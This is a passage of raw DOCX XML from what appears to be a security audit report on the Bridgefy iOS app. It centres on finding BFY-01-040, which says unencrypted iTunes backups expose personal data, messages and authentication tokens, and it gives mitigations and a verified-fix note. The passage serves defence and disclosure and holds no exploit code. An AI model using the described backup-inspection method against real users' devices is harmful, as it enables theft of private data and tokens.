      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"CoreData"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>container</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.persistentStoreDescriptions.first</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>!.setOption(FileProtectionType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.complete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>as NSObject,forKey: NSPersistentStoreFileProtectionKey)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>container</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.loadPersistentStores</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="187"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487602688">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>282957</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="45" name="Graphic 45"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="45" name="Graphic 45"/>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22.280127pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15713792;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape34" coordorigin="1440,446" coordsize="2880,0" path="m1440,446l4320,446e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="45"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId90">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/questions/27933387/nsurlcache-and-data-protection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId91">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.zetetic.net/sqlcipher/ios-tutorial/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="79"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId92">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>http://blogs.quovantis.com/best-practices-to-avoid-security-vulnerabilities-in-your-ios-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>app/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250039" w:id="16"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-040</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>PII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Backups</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="37751C"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid. Bridgefy iOS 1.0.0 build 274 was found to implement the proposed mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="369"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the iOS app reveals user PII,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>contact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>list,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Firebase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>FCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>token, as well as authentication tokens in iOS backups. The severity of this issue is limited given that the attacker requires access to a computer where a backup is present. The backup must also not be encrypted or the attacker requires knowledge of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>password to decrypt the backup.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>malicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>iTunes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>backups</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>browse certain files of the app that reveal user PII, the contact list, broadcast and direct messages, prekeys, the Firebase FCM token, as well as authentication tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This issue can be verified by backing up an iDevice where the Bridgefy app has been installed. Then, the whole device must be backed up without encryption with iTunes. Finally, the resulting iTunes backup files can be inspected for leaks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please note that, as demonstrated in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-037</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, the attacker is able to obtain the information mentioned above from the following files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Library/Application Support/CoreData.sqlite-wal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Library/Preferences/com.bridgefy.BridgefyNewStaging.plist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="373"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to implement a safer form of storage at rest, for example using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>SQLCipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> and keeping the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>keychain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>would be a superior approach.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="363" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>It is also possible to exclude certain files and directories from iOS backups by calling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[NSURL setResourceValue:forKey:error:] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NSURLIsExcludedFromBackupKey </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>57</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. A Swift example can be found in the blog post titled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Swift excluding files from iCloud backup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>58</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>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7"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487603200">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>191141</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="46" name="Graphic 46"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
